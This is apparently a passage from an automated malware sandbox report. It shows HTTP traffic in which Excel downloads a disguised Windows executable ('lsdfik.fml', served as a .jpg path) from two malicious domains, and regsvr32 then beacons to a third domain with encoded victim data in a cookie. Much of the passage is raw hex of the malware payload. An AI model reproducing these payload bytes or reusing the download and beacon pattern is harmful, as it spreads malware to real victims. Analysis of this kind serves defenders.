                                                                                                                                                                                              Jul 6, 2021 15:07:24.450412989 CEST6INData Raw: 8c 24 a8 00 00 00 0f b7 84 24 b2 00 00 00 89 84 24 90 01 00 00 48 8b 8c 24 a8 00 00 00 48 8b 49 18 48 89 8c 24 a8 00 00 00 0f b7 84 24 b2 00 00 00 89 84 24 8c 01 00 00 48 8b 8c 24 a8 00 00 00 48 8b 49 20 48 89 4c 24 70 0f b7 84 24 b2 00 00 00 89
                                                                                                                                                                                              Data Ascii: $$$H$HIH$$$H$HI HL$p$$H|$p$$HL$pHIPHL$h$$HL$pfQHf$$$|HD$`$$xD$/$tHT$`$p$pAL
                                                                                                                                                                                              Jul 6, 2021 15:07:24.450428963 CEST7INData Raw: 00 8b 02 89 c2 48 01 d1 48 89 0d 47 d2 00 00 0f b7 84 24 b2 00 00 00 89 84 24 f8 00 00 00 8b 44 24 34 83 c8 02 89 44 24 34 c7 84 24 f4 00 00 00 89 b4 5a f6 e9 e5 00 00 00 8b 84 24 84 00 00 00 8b 4c 24 44 81 f1 89 b4 5a f6 39 c8 0f 85 57 00 00 00
                                                                                                                                                                                              Data Ascii: HHG$$D$4D$4$Z$L$DZ9W$$H$H$HH$$D$4D$4$Zp$L$@Z9R$$H$H$HHw$
                                                                                                                                                                                              Jul 6, 2021 15:07:24.450444937 CEST8INData Raw: 00 44 89 9c 24 7c 03 00 00 48 8b b4 24 b8 00 00 00 48 89 74 24 70 48 8b b4 24 a0 00 00 00 48 89 b4 24 60 03 00 00 48 8b b4 24 60 03 00 00 89 b4 24 6c 03 00 00 c7 84 24 84 00 00 00 00 00 00 00 8b 84 24 84 00 00 00 3b 84 24 80 00 00 00 0f 83 c4 00
                                                                                                                                                                                              Data Ascii: D$|H$Ht$pH$H$`H$`$l$$;$H$H$PH$P$\HL$pHL$xH$H$@H$@$LLD$xILD$xL$L$0L$0D$<LL$pILL$pL$L$ L
                                                                                                                                                                                              Jul 6, 2021 15:07:24.450463057 CEST10INData Raw: 00 48 8b 8c 24 e0 01 00 00 89 8c 24 ec 01 00 00 48 8b 94 24 a0 00 00 00 4c 8b 84 24 a8 00 00 00 41 8b 48 28 41 89 c8 4c 01 c2 48 89 54 24 50 48 8b 54 24 50 48 89 94 24 d0 01 00 00 48 8b 94 24 d0 01 00 00 89 94 24 dc 01 00 00 48 83 7c 24 50 00 0f
                                                                                                                                                                                              Data Ascii: H$$H$L$AH(ALHT$PHT$PH$H$$H|$P'HD$PH$HGL$(HDD$(E1H$H$TE1DHD$@HD$@H$H$$H;L$@qH$H$H$$HL$@D
                                                                                                                                                                                              Jul 6, 2021 15:07:24.450479984 CEST11INData Raw: 0f 84 0b 00 00 00 83 7c 24 60 00 0f 85 9e 00 00 00 8b 44 24 60 89 84 24 44 01 00 00 48 8b 4c 24 38 0f b7 41 16 83 e0 01 83 f8 00 0f 84 31 00 00 00 8b 44 24 60 89 84 24 40 01 00 00 c6 44 24 67 00 48 8b 4c 24 68 48 89 8c 24 30 01 00 00 48 8b 8c 24
                                                                                                                                                                                              Data Ascii: |$`D$`$DHL$8A1D$`$@D$gHL$hH$0H$0$<=HD$hH$ H$ $,D$gHL$hH$H$$D$`$HD$hH$H$$|$`MD$`$HL$@AD$TD$T
                                                                                                                                                                                              Jul 6, 2021 15:07:24.450495005 CEST13INData Raw: 01 00 00 4c 8b 4c 24 68 41 83 39 00 0f 84 86 00 00 00 48 8b 44 24 50 48 89 84 24 70 01 00 00 48 8b 84 24 70 01 00 00 89 84 24 7c 01 00 00 48 8b 4c 24 68 8b 01 89 c1 48 03 8c 24 88 00 00 00 48 89 4c 24 58 48 8b 4c 24 58 48 89 8c 24 60 01 00 00 48
                                                                                                                                                                                              Data Ascii: LL$hA9HD$PH$pH$p$|HL$hH$HL$XHL$XH$`H$`$lHT$hBH$HT$@HT$@H$PH$P$\hH$$LHL$hAH$HL$XHL$XH$@H$@$HHT$XHT$@HT$@H$0H
                                                                                                                                                                                              Jul 6, 2021 15:07:24.450509071 CEST14INData Raw: 48 8b 54 24 38 44 8b 44 24 4c 45 89 c1 46 0f b7 04 4a 44 89 c2 44 8b 04 91 44 89 c1 48 01 c8 48 89 44 24 30 48 8b 44 24 30 48 89 84 24 80 00 00 00 e9 70 00 00 00 48 8b 44 24 68 48 89 84 24 b8 00 00 00 48 8b 84 24 b8 00 00 00 89 84 24 c4 00 00 00
                                                                                                                                                                                              Data Ascii: HT$8DD$LEFJDDDHHD$0HD$0H$pHD$hH$H$$D$LD$LHD$hH$H$$HD$hH$H$$H$H$HH$LL$`DD$\T$[HL$PD$<HL$PHL$pHL$
                                                                                                                                                                                              Jul 6, 2021 15:07:24.451026917 CEST15INData Raw: 24 30 48 81 c1 28 00 00 00 48 89 4c 24 30 48 8b 4c 24 30 48 89 8c 24 a0 00 00 00 48 8b 8c 24 a0 00 00 00 89 8c 24 ac 00 00 00 e9 63 ff ff ff 48 8b 44 24 30 48 89 84 24 90 00 00 00 48 8b 84 24 90 00 00 00 89 84 24 9c 00 00 00 48 8b 44 24 50 48 89
                                                                                                                                                                                              Data Ascii: $0H(HL$0HL$0H$H$$cHD$0H$H$$HD$PH$H$$HD$hHD$hHHHT$HL$HD$HD$ HD$ D$,HL$H$H$$HD$H$H$$HL$HHHT$


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                              1192.168.2.2249168172.67.194.11780C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                              Jul 6, 2021 15:07:24.621185064 CEST62OUTGET /div/44376,8555986111.jpg HTTP/1.1
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              UA-CPU: AMD64
                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                              Host: voopeople.fun
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Jul 6, 2021 15:07:24.718043089 CEST64INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Tue, 06 Jul 2021 13:07:24 GMT
                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                              Content-Length: 57856
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Content-Disposition: attachment; filename=lsdfik.fml
                                                                                                                                                                                              Cache-Control: max-age=14400
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Age: 4273
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=s%2B8FAtNhnjQzr1O8UP9iUO08DcT1KxsaDvc7eha2EOsf1s2GNo8RKQERM9jS3FZgVQ56Yn9dYcZukmUANQD1gRcSFb5LWxl8mpfkjQj5s7CRS2qvwxr%2BerTCPw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 66a90e4f1fd42c22-FRA
                                                                                                                                                                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 00 00 00 00 00 01 00 00 02 00 00 00 e0 00 00
                                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(P@.text(8: `.rdata~P>@@.data`@.pdata
                                                                                                                                                                                              Jul 6, 2021 15:07:24.718106031 CEST65INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii: @@
                                                                                                                                                                                              Jul 6, 2021 15:07:24.718131065 CEST67INData Raw: 00 00 23 02 00 00 8b 05 5a dc 00 00 89 44 24 4c c7 84 24 ac 00 00 00 0b 00 00 00 8b 05 49 dc 00 00 35 89 b4 5a f6 89 05 3e dc 00 00 c7 84 24 a8 00 00 00 17 00 00 00 48 8b 15 78 dc 00 00 8b 05 22 dc 00 00 41 89 c0 48 89 54 24 20 4c 89 c2 41 b8 00
                                                                                                                                                                                              Data Ascii: #ZD$L$I5Z>$Hx"AHT$ LA0ALT$ AH<<H$HL$@$G$G$GHHD$0$GD$/$GHD$@L$?${HD$@HHD$@$
                                                                                                                                                                                              Jul 6, 2021 15:07:24.731333017 CEST68INData Raw: 00 48 8b 49 18 48 89 8c 24 a8 00 00 00 0f b7 84 24 b2 00 00 00 89 84 24 8c 01 00 00 48 8b 8c 24 a8 00 00 00 48 8b 49 20 48 89 4c 24 70 0f b7 84 24 b2 00 00 00 89 84 24 88 01 00 00 48 83 7c 24 70 00 0f 84 dc 06 00 00 0f b7 84 24 b2 00 00 00 89 84
                                                                                                                                                                                              Data Ascii: HIH$$$H$HI HL$p$$H|$p$$HL$pHIPHL$h$$HL$pfQHf$$$|HD$`$$xD$/$tHT$`$p$pALD$`D$/$lLD$hA
                                                                                                                                                                                              Jul 6, 2021 15:07:24.731364012 CEST69INData Raw: 00 00 8b 44 24 34 83 c8 02 89 44 24 34 c7 84 24 f4 00 00 00 89 b4 5a f6 e9 e5 00 00 00 8b 84 24 84 00 00 00 8b 4c 24 44 81 f1 89 b4 5a f6 39 c8 0f 85 57 00 00 00 0f b7 84 24 b2 00 00 00 89 84 24 f0 00 00 00 48 8b 8c 24 a8 00 00 00 48 8b 94 24 a0
                                                                                                                                                                                              Data Ascii: D$4D$4$Z$L$DZ9W$$H$H$HH$$D$4D$4$Zp$L$@Z9R$$H$H$HHw$$D$4D$4$
                                                                                                                                                                                              Jul 6, 2021 15:07:24.731378078 CEST71INData Raw: 00 00 48 89 b4 24 60 03 00 00 48 8b b4 24 60 03 00 00 89 b4 24 6c 03 00 00 c7 84 24 84 00 00 00 00 00 00 00 8b 84 24 84 00 00 00 3b 84 24 80 00 00 00 0f 83 c4 00 00 00 48 8b 84 24 a0 00 00 00 48 89 84 24 50 03 00 00 48 8b 84 24 50 03 00 00 89 84
                                                                                                                                                                                              Data Ascii: H$`H$`$l$$;$H$H$PH$P$\HL$pHL$xH$H$@H$@$LLD$xILD$xL$L$0L$0D$<LL$pILL$pL$L$ L$ D$,$$
                                                                                                                                                                                              Jul 6, 2021 15:07:24.731391907 CEST72INData Raw: a8 00 00 00 41 8b 48 28 41 89 c8 4c 01 c2 48 89 54 24 50 48 8b 54 24 50 48 89 94 24 d0 01 00 00 48 8b 94 24 d0 01 00 00 89 94 24 dc 01 00 00 48 83 7c 24 50 00 0f 84 27 00 00 00 48 8b 44 24 50 48 8b 8c 24 a0 00 00 00 48 8b 15 47 c7 00 00 89 4c 24
                                                                                                                                                                                              Data Ascii: AH(ALHT$PHT$PH$H$$H|$P'HD$PH$HGL$(HDD$(E1H$H$TE1DHD$@HD$@H$H$$H;L$@qH$H$H$$HL$@DLHLHL$ L
                                                                                                                                                                                              Jul 6, 2021 15:07:24.731436014 CEST74INData Raw: 48 8b 4c 24 38 0f b7 41 16 83 e0 01 83 f8 00 0f 84 31 00 00 00 8b 44 24 60 89 84 24 40 01 00 00 c6 44 24 67 00 48 8b 4c 24 68 48 89 8c 24 30 01 00 00 48 8b 8c 24 30 01 00 00 89 8c 24 3c 01 00 00 e9 3d 00 00 00 48 8b 44 24 68 48 89 84 24 20 01 00
                                                                                                                                                                                              Data Ascii: HL$8A1D$`$@D$gHL$hH$0H$0$<=HD$hH$ H$ $,D$gHL$hH$H$$D$`$HD$hH$H$$|$`MD$`$HL$@AD$TD$T$D$TT$`)T$`D$`$
                                                                                                                                                                                              Jul 6, 2021 15:07:24.731463909 CEST75INData Raw: 01 00 00 48 8b 84 24 70 01 00 00 89 84 24 7c 01 00 00 48 8b 4c 24 68 8b 01 89 c1 48 03 8c 24 88 00 00 00 48 89 4c 24 58 48 8b 4c 24 58 48 89 8c 24 60 01 00 00 48 8b 8c 24 60 01 00 00 89 8c 24 6c 01 00 00 48 8b 54 24 68 8b 42 10 89 c2 48 03 94 24
                                                                                                                                                                                              Data Ascii: H$p$|HL$hH$HL$XHL$XH$`H$`$lHT$hBH$HT$@HT$@H$PH$P$\hH$$LHL$hAH$HL$XHL$XH$@H$@$HHT$XHT$@HT$@H$0H$0$<H$$,
                                                                                                                                                                                              Jul 6, 2021 15:07:24.731523991 CEST76INData Raw: 48 01 c8 48 89 44 24 30 48 8b 44 24 30 48 89 84 24 80 00 00 00 e9 70 00 00 00 48 8b 44 24 68 48 89 84 24 b8 00 00 00 48 8b 84 24 b8 00 00 00 89 84 24 c4 00 00 00 8b 44 24 4c 83 c0 01 89 44 24 4c e9 93 fe ff ff 48 8b 44 24 68 48 89 84 24 a8 00 00
                                                                                                                                                                                              Data Ascii: HHD$0HD$0H$pHD$hH$H$$D$LD$LHD$hH$H$$HD$hH$H$$H$H$HH$LL$`DD$\T$[HL$PD$<HL$PHL$pHL$pL$|HL$PD$+HD$HHD$
                                                                                                                                                                                              Jul 6, 2021 15:07:24.731558084 CEST78INData Raw: 8b 8c 24 a0 00 00 00 89 8c 24 ac 00 00 00 e9 63 ff ff ff 48 8b 44 24 30 48 89 84 24 90 00 00 00 48 8b 84 24 90 00 00 00 89 84 24 9c 00 00 00 48 8b 44 24 50 48 89 84 24 80 00 00 00 48 8b 84 24 80 00 00 00 89 84 24 8c 00 00 00 48 c7 44 24 68 00 00
                                                                                                                                                                                              Data Ascii: $$cHD$0H$H$$HD$PH$H$$HD$hHD$hHHHT$HL$HD$HD$ HD$ D$,HL$H$H$$HD$H$H$$HL$HHHT$D$HL$H$H$


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                              2192.168.2.2249169104.21.55.8380C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                              Jul 6, 2021 15:07:24.897356033 CEST125OUTGET /div/44376,8555986111.jpg HTTP/1.1
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              UA-CPU: AMD64
                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                              Host: uppercilio.fun
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Jul 6, 2021 15:07:24.997143984 CEST126INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Tue, 06 Jul 2021 13:07:24 GMT
                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                              Content-Length: 57856
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Content-Disposition: attachment; filename=lsdfik.fml
                                                                                                                                                                                              Cache-Control: max-age=14400
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Age: 4272
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=HxS6DVkhc1ZhRsctA4%2B4wRcXNfsXPSjIis2vJtDaAwWpiBqHwotxFztLYL%2B0PI3TPlFoVoVaXUfSfgm1bcUzX%2FeCFmdgedKItMbt9fWiw3XeisseZQAYXFiKEB4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 66a90e50ca8c2c2a-FRA
                                                                                                                                                                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 00 00 00 00 00 01 00 00 02 00 00 00 e0 00 00
                                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(P@.text(8: `.rdata~P>@@.data`@.pdata
                                                                                                                                                                                              Jul 6, 2021 15:07:24.997181892 CEST128INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii: @@
                                                                                                                                                                                              Jul 6, 2021 15:07:24.997205019 CEST129INData Raw: 00 00 23 02 00 00 8b 05 5a dc 00 00 89 44 24 4c c7 84 24 ac 00 00 00 0b 00 00 00 8b 05 49 dc 00 00 35 89 b4 5a f6 89 05 3e dc 00 00 c7 84 24 a8 00 00 00 17 00 00 00 48 8b 15 78 dc 00 00 8b 05 22 dc 00 00 41 89 c0 48 89 54 24 20 4c 89 c2 41 b8 00
                                                                                                                                                                                              Data Ascii: #ZD$L$I5Z>$Hx"AHT$ LA0ALT$ AH<<H$HL$@$G$G$GHHD$0$GD$/$GHD$@L$?${HD$@HHD$@$
                                                                                                                                                                                              Jul 6, 2021 15:07:24.997226000 CEST130INData Raw: 00 48 8b 49 18 48 89 8c 24 a8 00 00 00 0f b7 84 24 b2 00 00 00 89 84 24 8c 01 00 00 48 8b 8c 24 a8 00 00 00 48 8b 49 20 48 89 4c 24 70 0f b7 84 24 b2 00 00 00 89 84 24 88 01 00 00 48 83 7c 24 70 00 0f 84 dc 06 00 00 0f b7 84 24 b2 00 00 00 89 84
                                                                                                                                                                                              Data Ascii: HIH$$$H$HI HL$p$$H|$p$$HL$pHIPHL$h$$HL$pfQHf$$$|HD$`$$xD$/$tHT$`$p$pALD$`D$/$lLD$hA
                                                                                                                                                                                              Jul 6, 2021 15:07:24.997247934 CEST132INData Raw: 00 00 8b 44 24 34 83 c8 02 89 44 24 34 c7 84 24 f4 00 00 00 89 b4 5a f6 e9 e5 00 00 00 8b 84 24 84 00 00 00 8b 4c 24 44 81 f1 89 b4 5a f6 39 c8 0f 85 57 00 00 00 0f b7 84 24 b2 00 00 00 89 84 24 f0 00 00 00 48 8b 8c 24 a8 00 00 00 48 8b 94 24 a0
                                                                                                                                                                                              Data Ascii: D$4D$4$Z$L$DZ9W$$H$H$HH$$D$4D$4$Zp$L$@Z9R$$H$H$HHw$$D$4D$4$
                                                                                                                                                                                              Jul 6, 2021 15:07:24.997272015 CEST133INData Raw: 00 00 48 89 b4 24 60 03 00 00 48 8b b4 24 60 03 00 00 89 b4 24 6c 03 00 00 c7 84 24 84 00 00 00 00 00 00 00 8b 84 24 84 00 00 00 3b 84 24 80 00 00 00 0f 83 c4 00 00 00 48 8b 84 24 a0 00 00 00 48 89 84 24 50 03 00 00 48 8b 84 24 50 03 00 00 89 84
                                                                                                                                                                                              Data Ascii: H$`H$`$l$$;$H$H$PH$P$\HL$pHL$xH$H$@H$@$LLD$xILD$xL$L$0L$0D$<LL$pILL$pL$L$ L$ D$,$$
                                                                                                                                                                                              Jul 6, 2021 15:07:24.997296095 CEST134INData Raw: a8 00 00 00 41 8b 48 28 41 89 c8 4c 01 c2 48 89 54 24 50 48 8b 54 24 50 48 89 94 24 d0 01 00 00 48 8b 94 24 d0 01 00 00 89 94 24 dc 01 00 00 48 83 7c 24 50 00 0f 84 27 00 00 00 48 8b 44 24 50 48 8b 8c 24 a0 00 00 00 48 8b 15 47 c7 00 00 89 4c 24
                                                                                                                                                                                              Data Ascii: AH(ALHT$PHT$PH$H$$H|$P'HD$PH$HGL$(HDD$(E1H$H$TE1DHD$@HD$@H$H$$H;L$@qH$H$H$$HL$@DLHLHL$ L
                                                                                                                                                                                              Jul 6, 2021 15:07:24.997328997 CEST136INData Raw: 48 8b 4c 24 38 0f b7 41 16 83 e0 01 83 f8 00 0f 84 31 00 00 00 8b 44 24 60 89 84 24 40 01 00 00 c6 44 24 67 00 48 8b 4c 24 68 48 89 8c 24 30 01 00 00 48 8b 8c 24 30 01 00 00 89 8c 24 3c 01 00 00 e9 3d 00 00 00 48 8b 44 24 68 48 89 84 24 20 01 00
                                                                                                                                                                                              Data Ascii: HL$8A1D$`$@D$gHL$hH$0H$0$<=HD$hH$ H$ $,D$gHL$hH$H$$D$`$HD$hH$H$$|$`MD$`$HL$@AD$TD$T$D$TT$`)T$`D$`$
                                                                                                                                                                                              Jul 6, 2021 15:07:24.997350931 CEST137INData Raw: 01 00 00 48 8b 84 24 70 01 00 00 89 84 24 7c 01 00 00 48 8b 4c 24 68 8b 01 89 c1 48 03 8c 24 88 00 00 00 48 89 4c 24 58 48 8b 4c 24 58 48 89 8c 24 60 01 00 00 48 8b 8c 24 60 01 00 00 89 8c 24 6c 01 00 00 48 8b 54 24 68 8b 42 10 89 c2 48 03 94 24
                                                                                                                                                                                              Data Ascii: H$p$|HL$hH$HL$XHL$XH$`H$`$lHT$hBH$HT$@HT$@H$PH$P$\hH$$LHL$hAH$HL$XHL$XH$@H$@$HHT$XHT$@HT$@H$0H$0$<H$$,
                                                                                                                                                                                              Jul 6, 2021 15:07:24.997374058 CEST139INData Raw: 48 01 c8 48 89 44 24 30 48 8b 44 24 30 48 89 84 24 80 00 00 00 e9 70 00 00 00 48 8b 44 24 68 48 89 84 24 b8 00 00 00 48 8b 84 24 b8 00 00 00 89 84 24 c4 00 00 00 8b 44 24 4c 83 c0 01 89 44 24 4c e9 93 fe ff ff 48 8b 44 24 68 48 89 84 24 a8 00 00
                                                                                                                                                                                              Data Ascii: HHD$0HD$0H$pHD$hH$H$$D$LD$LHD$hH$H$$HD$hH$H$$H$H$HH$LL$`DD$\T$[HL$PD$<HL$PHL$pHL$pL$|HL$PD$+HD$HHD$
                                                                                                                                                                                              Jul 6, 2021 15:07:24.997982025 CEST140INData Raw: 8b 8c 24 a0 00 00 00 89 8c 24 ac 00 00 00 e9 63 ff ff ff 48 8b 44 24 30 48 89 84 24 90 00 00 00 48 8b 84 24 90 00 00 00 89 84 24 9c 00 00 00 48 8b 44 24 50 48 89 84 24 80 00 00 00 48 8b 84 24 80 00 00 00 89 84 24 8c 00 00 00 48 c7 44 24 68 00 00
                                                                                                                                                                                              Data Ascii: $$cHD$0H$H$$HD$PH$H$$HD$hHD$hHHHT$HL$HD$HD$ HD$ D$,HL$H$H$$HD$H$H$$HL$HHHT$D$HL$H$H$


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                              3192.168.2.2249171172.67.213.11580C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                              Jul 6, 2021 15:07:27.325968027 CEST445OUTGET / HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Cookie: __gads=3565085024:1:7080:54; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=313739363035:416C627573:31384337383432373833324243433531; __io=0; _gid=67AFEDC5AC03
                                                                                                                                                                                              Host: astrocycle.download
                                                                                                                                                                                              Jul 6, 2021 15:07:27.874520063 CEST446INHTTP/1.1 404 Not Found
                                                                                                                                                                                              Date: Tue, 06 Jul 2021 13:07:27 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=GN9wYO%2BIuHVeDE2EWDQTg%2BEKZY5Nl%2Fwc0vzEgt9k98rnRs6rIHEnNd7r%2F6bXYCKHxUmoJyoC1IQCkvi71zSQPkur0%2F%2BM4ztJ8f9a4JHQ6lws%2Fs6%2B%2Br%2FebSEod2C%2FoFGRjQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 66a90e5fff624a61-FRA
